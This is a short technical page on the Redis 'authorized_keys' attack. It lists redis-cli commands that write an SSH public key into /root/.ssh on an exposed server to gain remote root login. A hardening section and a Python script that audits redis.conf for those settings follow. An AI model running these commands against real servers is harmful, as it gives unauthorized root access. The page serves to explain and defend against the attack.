Redis Hack
Remote login
How to reproduce
$ ssh-keygen -t rsa
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo
$ cat foo | redis-cli -h $remote_ip -x set crack
$ redis-cli -h $remote_ip
# in redis CLI
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
# save /root/.ssh/authorized_keys
save
How to avoid
# redis.conf
# prevent dbfilename from being changed over a remote connection
rename-command FLUSHALL ""
rename-command CONFIG ""
rename-command EVAL ""
requirepass mypassword
bind 127.0.0.1
# shell: create an unprivileged system user and group to run Redis under
groupadd -r redis && useradd -r -g redis redis
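The redis.conf settings listed above can be checked mechanically. The auditor below is an added example, not part of the original page; the name audit_redis_conf and both sample configurations are constructed for illustration.

```python
import shlex

LOOPBACK = {"127.0.0.1", "::1"}
MUST_DISABLE = {"FLUSHALL", "CONFIG", "EVAL"}  # commands this page disables

def audit_redis_conf(text):
    """Return findings for the settings listed under "How to avoid"."""
    bind, password, disabled = [], None, set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # blank line or comment
        try:
            parts = shlex.split(line)     # keeps "" as an empty argument
        except ValueError:
            continue                      # unbalanced quotes: skip the line
        key, args = parts[0].lower(), parts[1:]
        if key == "bind":
            bind = [a.lstrip("-") for a in args]   # "-::1" marks an optional address
        elif key == "requirepass" and args:
            password = args[0]
        elif key == "rename-command" and len(args) == 2 and args[1] == "":
            disabled.add(args[0].upper())          # renamed to "" means disabled
    findings = []
    if not bind or any(a not in LOOPBACK for a in bind):
        findings.append("bind: not restricted to loopback")
    if not password:
        findings.append("requirepass: not set")
    for cmd in sorted(MUST_DISABLE - disabled):
        findings.append(f"rename-command: {cmd} is not disabled")
    return findings

# Constructed sample inputs (not taken from a real server).
HARDENED = '''
rename-command FLUSHALL ""
rename-command CONFIG ""
rename-command EVAL ""
requirepass mypassword
bind 127.0.0.1
'''
EXPOSED = '''
bind 0.0.0.0
# requirepass mypassword
rename-command FLUSHALL ""
'''

if __name__ == "__main__":
    for name, conf in (("hardened", HARDENED), ("exposed", EXPOSED)):
        print(name, audit_redis_conf(conf) or "OK")
```

A command renamed to a non-empty string is reported as not disabled, since it can still be invoked under the new name.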
Last modified 2023-03-11: split into more parts (54b443e)